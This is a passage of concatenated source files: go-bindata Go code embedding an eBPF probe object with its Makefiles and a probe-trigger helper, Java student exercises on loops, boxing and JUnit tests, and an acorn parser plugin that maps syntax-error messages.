"\x4f\xf9\xa7\xe0\x96\x82\xff\x0b\x0c\x7f\x5f\xf5\x8f\xca\xe5\x82\xfe\xdf\xc0\x70\x55\xff\x0c\x95\x2b\xb0\xa9\xe0" +
"\x7f\x00\xc3\x97\x14\xff\x67\xa8\x5e\xb5\xa0\x7f\x17\x18\xae\xea\x33\x2f\xa7\x8a\x20\xc5\xcb\x06\xbc\x62\xc0\xab" +
"\x05\xec\x06\x00\x9c\x86\xc7\x72\x99\x5f\x07\xf0\x29\xc5\x67\x0a\xf8\x9b\x00\xf0\x84\xe4\x8f\x38\xdf\xa7\x28\x5e" +
"\x2e\xe0\xaf\x51\x7c\xe4\x8f\x38\xcf\x3a\xc5\xab\x05\x7c\xd1\x42\xde\x93\x39\xde\xe4\xeb\x54\x29\x7e\xaa\x80\x13" +
"\x2e\xa3\x38\xab\x91\x97\x14\x79\xc5\x3a\xda\x7c\x53\x9a\xc7\x02\x7c\x41\x92\xd1\xcb\x57\x25\x19\xbd\xbb\x2a\xc9" +
"\x34\xaa\x4e\xea\x5f\x4d\xc1\x59\xdd\x58\x73\xf0\x63\x2b\xf6\xd3\x7e\xdc\xbb\xec\x77\x78\x21\xc3\xd6\xb8\xe8\xc4" +
"\xfe\x76\xae\xb4\x38\x86\x8e\x43\xca\x4a\x63\xeb\xe8\x56\x29\xac\x01\x9d\xb7\xfc\x38\x09\x7a\x11\x74\xb6\x83\xae" +
"\x1f\x25\x3e\x55\x71\xfc\xcd\xce\x1b\xb1\x1b\xfa\x10\xba\x41\xe4\x74\xc1\x49\xd2\x38\x75\x2f\x83\x93\xec\x84\xf4" +
"\xbd\xba\xb1\x06\x4e\xdc\xc3\xce\x83\x73\x2d\xa7\xf5\x3c\xac\xaf\xae\x2e\x77\x96\xf1\xd5\x66\xaf\x16\x7b\x2d\x75" +
"\x96\x21\x74\xfb\xc9\x62\xe8\xf6\xdb\x4c\xab\xcd\xb4\xda\x4c\xab\xcd\xb4\xda\xb9\x56\xab\x90\xa3\x93\x8c\x1f\x69" +
"\xbe\x17\xc7\x25\x9e\xd2\x17\x94\xfa\x53\xff\xc7\xb7\xf8\x73\x42\xc1\x57\x0c\x7c\x25\x45\xfe\xf8\x00\x7b\xb5\x2f" +
"\x4e\x2b\x7a\x1f\xd1\x6e\x50\x1c\xdf\xf2\x52\x15\x7d\x79\x96\xef\x53\xd8\x0b\xfc\x25\x03\xff\x9e\x75\x38\xfe\x8b" +
"\x06\xfe\x5d\x0d\x7f\x59\xc3\x3f\x30\xf0\xbf\xce\x0f\x45\xed\xeb\x2a\xff\xdb\x06\xfe\x3d\xce\x4f\x24\xfe\x8a\x86" +
"\xff\x39\x03\xff\xf5\xf2\xe1\xf8\x5b\x06\xfe\x7b\x1a\xfe\xaa\x86\xff\x3c\xff\x3f\x45\xcd\xc1\x3b\xbc\x15\x36\x95" +
"\xf8\xab\xf9\x53\x32\xd8\xef\x4f\x1f\xce\xfe\x6b\xd0\xdb\xcf\xd5\xf4\xfa\x6a\xfe\x7f\x66\xb0\x6f\x1a\xec\x55\xf9" +
"\x36\xb7\x6f\x2b\x38\xe1\xf6\xdf\x2b\x78\x5d\xf1\xe3\x67\x8d\x4f\x38\x7e\xe1\xf6\x67\x0f\xf0\xbf\x62\xb0\xff\x9d" +
"\xdb\x93\x03\xec\xbf\xe3\x98\x7a\x1d\xd7\xf9\xd5\x74\x4d\xc1\xd5\xfc\xf9\xc6\x90\x3f\x75\xde\x7f\x44\x1f\x98\xa5" +
"\xf7\x60\x31\x7f\x7e\xd2\x70\xe3\xb8\xce\xf9\xeb\xf6\xc8\xef\x19\xc9\x5e\xfc\x2e\xfb\x3f\x00\x00\xff\xff\x00\xd3" +
"\xf3\x3f\xc8\x14\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 5320,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594314963, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>testdata/Makefile<|end_filename|>
LLVM_PREFIX ?= /usr/bin
CLANG ?= $(LLVM_PREFIX)/clang
CFLAGS := -target bpf -O2 -g -Wall -Werror $(CFLAGS)
.PHONY: all clean
all: loader-clang-6.0-el.elf loader-clang-7-el.elf loader-clang-8-el.elf loader-clang-9-el.elf rewrite-el.elf invalid_map-el.elf \
loader-clang-6.0-eb.elf loader-clang-7-eb.elf loader-clang-8-eb.elf loader-clang-9-eb.elf rewrite-eb.elf invalid_map-eb.elf
clean:
-$(RM) *.elf
loader-%-el.elf: loader.c
$* $(CFLAGS) -mlittle-endian -c $< -o $@
loader-%-eb.elf: loader.c
$* $(CFLAGS) -mbig-endian -c $< -o $@
%-el.elf: %.c
$(CLANG) $(CFLAGS) -mlittle-endian -c $< -o $@
%-eb.elf : %.c
$(CLANG) $(CFLAGS) -mbig-endian -c $< -o $@
<|start_filename|>manager/examples/tests_and_benchmarks/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
		return nil, clErr
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x55\xbb\x6b\x14\x61\x10\xff\xed\xdd\x25\x39\x63\x88\xa7\x88\xc4\xe3" +
"\x84\x25\x12\x2b\xd9\x3c\xf0\x05\x5a\x84\x40\x62\x73\x85\x68\xd2\x09\xcb\x7a\xb7\x49\x0e\x73\x0f\x76\x37\x7a\x31" +
"\x82\x36\x82\x9d\x36\x8a\x8d\x18\xad\x52\xd8\xc7\x2e\xff\x42\x4a\x0b\x8b\x94\x82\x4d\xac\x6c\x82\x9f\xcc\xb7\xb3" +
"\xb7\x9b\xb9\x5d\x03\xd6\x0e\xec\xcd\x37\xbf\x9b\xdf\x3c\xbe\x99\xbb\x7d\x36\x5f\x5d\xc8\x19\x06\x22\x31\xf0\x0b" +
"\xb1\x15\xcb\xea\x40\x7c\x9e\xe5\xcf\x53\x30\xb0\x63\x40\xfb\xd7\xca\x87\x8a\xd0\xdd\x4f\xa1\xcf\x50\x0e\x38\x54" +
"\x4a\x8d\x89\x60\x2f\x10\xfa\x2f\x61\x44\xdb\xc4\x1f\x06\xf0\xb0\xfc\x4d\x45\x76\xdd\x09\x9c\x5a\xf9\xab\xb6\x89" +
"\xdf\x6a\x9b\x01\x9d\x5d\x3f\x30\x37\xcb\x7b\x61\x9e\x8f\x9c\xc7\x00\xf6\x94\x52\x3b\x39\x60\x94\xe3\x0f\x02\x18" +
"\x40\xa5\x17\x9f\xc4\xc9\x15\x42\xcd\x7d\xac\x0c\x84\x75\xec\xde\x63\x3b\x0f\x98\x00\x1e\xb3\xbe\x70\xf1\x9c\xa8" +
"\xef\xa0\x57\xcf\x65\x73\xa5\x4d\xe7\xc0\x9c\xa8\x6f\x96\xbf\xf7\xf0\x46\xab\xb3\x1e\xe3\xfb\x3d\xdc\x9c\xa8\x53" +
"\x48\x2c\xb7\x3d\x73\x33\xd1\x97\xdb\xed\xb8\x74\xae\x05\x6e\x3d\xea\xcb\x29\x70\xbd\xf9\xf0\x90\xd6\xe7\x78\xa2" +
"\x4f\x8a\xa3\x94\x52\xd1\xfd\xee\x96\x42\xfd\x86\xed\x1c\x00\x8a\x54\xe4\xf3\x7f\x89\x85\xf6\x8a\x76\x8a\xf6\x6d" +
"\x98\x31\x9a\x09\xcd\x83\x66\x46\xf3\xa2\x99\xd2\x3c\x69\xe6\xa4\x87\x71\xfb\x4e\x15\xc0\x6f\xa5\xd4\x87\x1f\x06" +
"\xc6\x44\x4c\xbd\x6e\xc9\x2f\x0a\x89\x87\x86\xc0\xf3\x29\x45\xfe\x4f\xee\xa2\xf8\xf4\xa4\x41\xbf\x86\x31\x7e\x22" +
"\xd9\x4a\xfb\x21\x0a\x99\xd7\xa1\x7f\x2a\x89\xbf\xd5\x9f\x79\x6c\x09\xfc\x15\xe3\xcf\x45\xec\x97\x8c\xbf\x4e\xc9" +
"\x99\x47\xbe\x0f\xb3\x00\x9c\xd6\x0d\xc5\x6d\x92\x4c\x68\xfc\x44\x1f\x4e\x7d\x9d\x49\xc4\x89\x7a\x73\xb4\x7f\xfc" +
"\xe7\x52\x61\xdc\x64\x9b\x4c\x8a\x56\x49\xd8\xda\xdb\x0a\xdc\x6e\x00\x6b\x6e\x71\xc1\xd2\x07\xcf\x5d\xeb\xd6\x3b" +
"\x93\xcd\x0d\x7b\x79\xbd\x55\xb3\x69\xb0\xb0\x1f\xb9\x9e\xdf\x68\xb7\x60\xaf\x35\x6a\x6e\xcb\x77\xb5\x9b\xe5\xae" +
"\xda\xcb\x9e\xd3\x74\xd1\x74\x1a\x2d\xab\x06\xcb\x0f\xbc\xc0\x79\x00\xcb\xdf\x68\x92\x6e\x3a\x1d\xff\x48\x20\x9b" +
"\x36\x44\xe7\x82\xe5\xb5\xc9\x20\xca\xb4\x35\x7d\x0d\xd5\xb9\xb9\x29\xfb\x6a\xa8\xae\x84\x6a\x46\x38\xf5\x5f\xe8" +
"\x3f\x48\x55\xcf\xa1\x5f\xbe\xf0\x05\x7f\x16\xb8\x1c\xa3\xc1\xcf\xa0\xc0\x67\x33\xf2\x15\x84\x7d\xf6\x18\xbe\xdc" +
"\xd5\xa2\xf0\x2b\xf1\x1c\xa5\xbc\x2b\xc4\xdf\x93\x8c\x72\x9f\x45\x1c\xc5\xef\x73\x7e\x79\x07\xfb\x9c\xb7\x62\xfc" +
"\xbd\xfe\xf7\xcc\x9f\x11\xf8\x61\x2e\xce\x9b\x14\x43\xe8\x6e\x06\xbf\xc4\x05\x8d\x4b\x5c\xf0\x27\x33\xea\x9f\xc9" +
"\xa7\xd7\x2b\xe7\x77\x29\x83\x7f\x23\x83\x2f\x6d\x3f\x25\x26\xc9\x2d\xe6\x9f\x3f\x26\xff\x50\x06\x7f\x89\xf9\xe6" +
"\x31\xfc\x9b\x8c\xc9\x77\x50\x97\xf9\x53\x02\x97\xfb\x73\x3d\x63\x7f\xb6\x53\xf6\x67\x24\x65\x7f\x16\x33\xde\x7f" +
"\xdb\x9c\xff\x20\x51\xf7\x60\x82\x1f\xfd\x1f\xff\x09\x00\x00\xff\xff\xc9\x46\x04\x2f\x28\x09\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 2344,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594298158, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>internal/btf/testdata/Makefile<|end_filename|>
# Usage: make KDIR=/path/to/foo
vmlinux-btf.gz: $(KDIR)/vmlinux
objcopy --dump-section .BTF=/dev/stdout "$<" | gzip > "$@"
<|start_filename|>manager/examples/object_pinning/utils.go<|end_filename|>
package main
import (
"bytes"
"io"
"os"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Creates and then removes a tmp folder to trigger the probes
func trigger() error {
logrus.Println("Generating events to trigger the probes ...")
// Creating a tmp directory to trigger the probes
tmpDir := "/tmp/test_folder"
logrus.Printf("creating %v", tmpDir)
err := os.MkdirAll(tmpDir, 0666)
if err != nil {
return err
}
// Removing a tmp directory to trigger the probes
logrus.Printf("removing %v", tmpDir)
return os.RemoveAll(tmpDir)
}
| achntrl/ebpf |
<|start_filename|>4_semestre/teste_de_software/atividade_avaliacao_1/src/aula/Pessoa.java<|end_filename|>
package aula;
public class Pessoa {
public String nome;
@Override
	public boolean equals(Object o) {
		if (!(o instanceof Pessoa)) {
			return false;
		}
		Pessoa p = (Pessoa) o;
		// Compare names by value; == would only compare String references
		return p.nome == null ? this.nome == null : p.nome.equals(this.nome);
	}
}
<|start_filename|>4_semestre/teste_de_software/aula_1/src/aula/Operacao.java<|end_filename|>
package aula;
public class Operacao {
public double potencia(int a, int b) {
return Math.pow(a, b);
}
public double divisao(int a, int b) {
return a / b;
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/for_e_for_each/for/FoorDois.java<|end_filename|>
import java.util.*;
public class FoorDois{
public static void main(String[] args){
int[] a = {1,2,3,4,5};
for(int i = 0; i < a.length; i += 2)
System.out.println(a[i]);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/primitivos/Primitivo.java<|end_filename|>
import java.util.*;
public class Primitivo{
public static void main(String[] args){
int a = 123;
int b = a;
a = 321;
System.out.println("Valor de a: " + a + "\nValor de b: " + b);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/estatico/Principal.java<|end_filename|>
public class Principal{
public static void main(String[] args){
System.out.println(Calculadora.soma(1.0,2.0));
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/referencia/teste/Principal.java<|end_filename|>
public class Principal{
public static void main(String[] args){
Pessoa pessoa = new Pessoa();
Pessoa pessoaDois = new Pessoa();
pessoa.setNome("Felipe");
pessoaDois.setNome("Maria");
System.out.println("Pessoa Um: " + pessoa.getNome() + "\nPessoa Dois: " + pessoaDois.getNome());
pessoa = pessoaDois;
pessoa.setNome("Roberta");
System.out.println("Pessoa Um: " + pessoa.getNome() + "\nPessoa Dois: " + pessoaDois.getNome());
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/empacotamento/Pacote.java<|end_filename|>
// Wildcard import used only for the tests
// Boxing example - technique used up to Java 5
// It was used when a primitive type had to be treated as
// an object (reference type)
import java.util.*;
public class Pacote{
public static void main(String[] args){
int primitivo = 10;
Integer objeto = new Integer(primitivo);
int valueObjeto = objeto.intValue();
System.out.println(valueObjeto);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/for_e_for_each/for/Foor.java<|end_filename|>
import java.util.*;
public class Foor{
public static void main(String[] args){
int a[] = {1,2,3,4,5};
for (int i: a){
System.out.println(i);
}
}
}
<|start_filename|>4_semestre/teste_de_software/atividade_avaliacao_1/src/aula/A.java<|end_filename|>
package aula;
public class A {
public boolean m(Integer a) {
return a / 2 < 5 ? true : false;
}
public int n(int a, int b) throws Exception {
if (a < b) {
return a;
} else if (a > b) {
return b;
}
throw new Exception();
}
public String o() {
return null;
}
public String p() {
return "oi";
}
public Pessoa q() {
Pessoa p = new Pessoa();
p.nome = "Ana";
return p;
}
}
<|start_filename|>4_semestre/teste_de_software/atividade_avaliacao_2/test/aula/AreaQuadradoTest.java<|end_filename|>
package aula;
import static org.junit.Assert.assertEquals;
import java.util.Arrays;
import java.util.Collection;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.junit.runners.Parameterized.Parameters;
// A parameterized test class must be annotated with @RunWith
@RunWith(Parameterized.class)
@SuppressWarnings("rawtypes")
public class AreaQuadradoTest {
private int a;
private int b;
private int saida;
private Operacao op;
@Before
public void setUp() {
op = new Operacao();
}
@After
public void tearDown() {
op = null;
}
public AreaQuadradoTest(int b, int a, int saida) {
this.b = b;
this.a = a;
this.saida = saida;
}
@Parameters
public static Collection parameters() {
return Arrays.asList(new Object[][] {
// b, a, saida
{ 0, 0, 0 }, { 1, 1, 1 }, { 2, 0, 0 }, { 0, 2, 0 } });
}
@Test
public void testOne() throws Exception {
assertEquals(saida, op.areaRetangulo(b, a), 0);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/estatico/Calculadora.java<|end_filename|>
// import java.util.*;
public class Calculadora{
public static Double soma(Double a, Double b){
return a + b;
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/autoboxing/AutoBoxing.java<|end_filename|>
import java.util.*;
public class AutoBoxing{
public static void main(String[] args){
		// Up to Java 5
		int primitivo = 5; // Declare the primitive type
		Integer numero = new Integer(primitivo); // It was necessary to instantiate a wrapper class of the required type
		// In more recent Java versions this is no longer necessary
		int a = 123;
		Integer b = a; // The conversion from primitive to reference type happens implicitly (autoboxing), so no explicit object instantiation is needed
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/for_e_for_each/for/FoorTres.java<|end_filename|>
import java.util.*;
public class FoorTres{
public static void main(String[] args){
int arr[] = {1,2,3};
for(int i = 0; i <= arr.length; i++)
System.out.println(arr[i]);
}
}
| M3nin0/revisor |
<|start_filename|>src/acorn/parser/error-messages.js<|end_filename|>
import MESSAGE from "../../constant/message.js"
import errors from "../../parse/errors.js"
import shared from "../../shared.js"
import { tokTypes as tt } from "../../acorn.js"
function init() {
const {
ILLEGAL_AWAIT_IN_NON_ASYNC_FUNCTION,
ILLEGAL_HTML_COMMENT,
ILLEGAL_IMPORT_META_OUTSIDE_MODULE,
ILLEGAL_NEW_TARGET,
ILLEGAL_RETURN_STATEMENT,
INVALID_ESCAPED_RESERVED_WORD,
INVALID_OR_UNEXPECTED_TOKEN,
UNEXPECTED_EOS,
UNEXPECTED_EVAL_OR_ARGUMENTS,
UNEXPECTED_IDENTIFIER,
UNEXPECTED_RESERVED_WORD,
UNEXPECTED_STRICT_MODE_RESERVED_WORD,
UNEXPECTED_STRING,
UNEXPECTED_TOKEN,
UNTERMINATED_ARGUMENTS_LIST,
UNTERMINATED_TEMPLATE
} = MESSAGE
const ENGINE_DUPLICATE_EXPORT = "Duplicate export of '"
const PARSER_DUPLICATE_EXPORT = "Duplicate export '"
const PARSER_IMPORT_EXPORT_INVALID_LEVEL = "'import' and 'export' may only appear at the top level"
const PARSER_IMPORT_EXPORT_OUTSIDE_MODULE = "'import' and 'export' may appear only with 'sourceType: module'"
const PARSER_INVALID_ESCAPED_RESERVED_WORD = "Escape sequence in keyword "
const messageLookup = new Set([
ILLEGAL_AWAIT_IN_NON_ASYNC_FUNCTION,
ILLEGAL_HTML_COMMENT,
ILLEGAL_IMPORT_META_OUTSIDE_MODULE,
ILLEGAL_NEW_TARGET,
ILLEGAL_RETURN_STATEMENT,
INVALID_ESCAPED_RESERVED_WORD,
INVALID_OR_UNEXPECTED_TOKEN,
UNEXPECTED_EOS,
UNEXPECTED_EVAL_OR_ARGUMENTS,
UNEXPECTED_IDENTIFIER,
UNEXPECTED_RESERVED_WORD,
UNEXPECTED_STRICT_MODE_RESERVED_WORD,
UNEXPECTED_STRING,
UNEXPECTED_TOKEN,
UNTERMINATED_ARGUMENTS_LIST,
UNTERMINATED_TEMPLATE
])
const replacementMap = new Map([
["'return' outside of function", ILLEGAL_RETURN_STATEMENT],
["Binding arguments in strict mode", UNEXPECTED_EVAL_OR_ARGUMENTS],
["Binding await in strict mode", UNEXPECTED_RESERVED_WORD],
["Cannot use keyword 'await' outside an async function", ILLEGAL_AWAIT_IN_NON_ASYNC_FUNCTION],
["The keyword 'await' is reserved", UNEXPECTED_RESERVED_WORD],
["The keyword 'yield' is reserved", UNEXPECTED_STRICT_MODE_RESERVED_WORD],
["Unterminated string constant", INVALID_OR_UNEXPECTED_TOKEN],
["Unterminated template", UNTERMINATED_TEMPLATE],
["new.target can only be used in functions", ILLEGAL_NEW_TARGET]
])
const Plugin = {
enable(parser) {
parser.parseExprList = parseExprList
parser.raise = raise
parser.raiseRecoverable = raise
parser.unexpected = unexpected
return parser
}
}
function parseExprList(close, allowTrailingComma, allowEmpty, refDestructuringErrors) {
const elements = []
let first = true
while (! this.eat(close)) {
if (! first) {
if (allowEmpty ||
close !== tt.parenR) {
this.expect(tt.comma)
} else if (! this.eat(tt.comma)) {
this.raise(this.start, UNTERMINATED_ARGUMENTS_LIST)
}
if (allowTrailingComma &&
this.afterTrailingComma(close)) {
break
}
} else {
first = false
}
let element
if (allowEmpty &&
this.type === tt.comma) {
element = null
} else if (this.type === tt.ellipsis) {
element = this.parseSpread(refDestructuringErrors)
if (refDestructuringErrors &&
this.type === tt.comma &&
refDestructuringErrors.trailingComma === -1) {
refDestructuringErrors.trailingComma = this.start
}
} else {
element = this.parseMaybeAssign(false, refDestructuringErrors)
}
elements.push(element)
}
return elements
}
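  // raise() normalizes acorn's native parser messages to the engine-style
  // messages defined in MESSAGE; anything unrecognized (and not an
  // UNEXPECTED_TOKEN variant) is silently ignored rather than thrown.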
function raise(pos, message) {
if (replacementMap.has(message)) {
message = replacementMap.get(message)
} else if (message === PARSER_IMPORT_EXPORT_INVALID_LEVEL ||
message === PARSER_IMPORT_EXPORT_OUTSIDE_MODULE) {
message = UNEXPECTED_TOKEN + " " + this.type.label
} else if (message.startsWith(PARSER_DUPLICATE_EXPORT)) {
message = message.replace(PARSER_DUPLICATE_EXPORT, ENGINE_DUPLICATE_EXPORT)
} else if (message.startsWith(PARSER_INVALID_ESCAPED_RESERVED_WORD)) {
message = INVALID_ESCAPED_RESERVED_WORD
} else if (! messageLookup.has(message) &&
! message.startsWith(UNEXPECTED_TOKEN)) {
return
}
throw new errors.SyntaxError(this, pos, message)
}
function unexpected(pos) {
if (pos === void 0) {
pos = this.start
}
const message = this.type === tt.eof
? UNEXPECTED_EOS
: INVALID_OR_UNEXPECTED_TOKEN
this.raise(pos, message)
}
return Plugin
}
export default shared.inited
? shared.module.acornParserErrorMessages
: shared.module.acornParserErrorMessages = init()
<|start_filename|>src/module/esm/parse-load.js<|end_filename|>
import ENTRY from "../../constant/entry.js"
import load from "./load.js"
import shared from "../../shared.js"
import validateDeep from "./validate-deep.js"
const {
STATE_PARSING_COMPLETED,
